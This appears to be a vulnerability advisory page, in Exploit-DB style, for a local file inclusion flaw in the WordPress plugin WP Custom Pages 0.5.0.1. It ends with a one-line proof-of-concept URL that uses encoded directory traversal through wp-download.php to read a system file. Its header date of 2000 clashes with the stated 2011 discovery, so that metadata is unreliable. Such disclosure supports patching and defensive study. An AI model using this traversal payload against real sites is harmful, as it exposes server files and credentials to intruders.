WordPress WP Custom Pages 0.5.0.1 Local File Inclusion

vendor:

WP Custom Pages

by:

AutoSec Tools

04.05.2000

CVSS

CRITICAL

Local File Inclusion

CWE

Product Name: WP Custom Pages

Affected Version From: 0.5.0.1

Affected Version To: 0.5.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wp_custom_pages:0.5.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista + XAMPP

2011

WordPress WP Custom Pages 0.5.0.1 Local File Inclusion

A local file inclusion vulnerability exists in WordPress WP Custom Pages 0.5.0.1. An attacker can exploit this vulnerability to include a local file on the server. This can be exploited by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can result in the disclosure of sensitive information such as system and software configuration details, usernames and passwords, and potentially the execution of arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.

Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................WordPress WP Custom Pages 0.5.0.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://wordpress.org/extend/plugins/wp-custom-pages/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--PoC--

http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini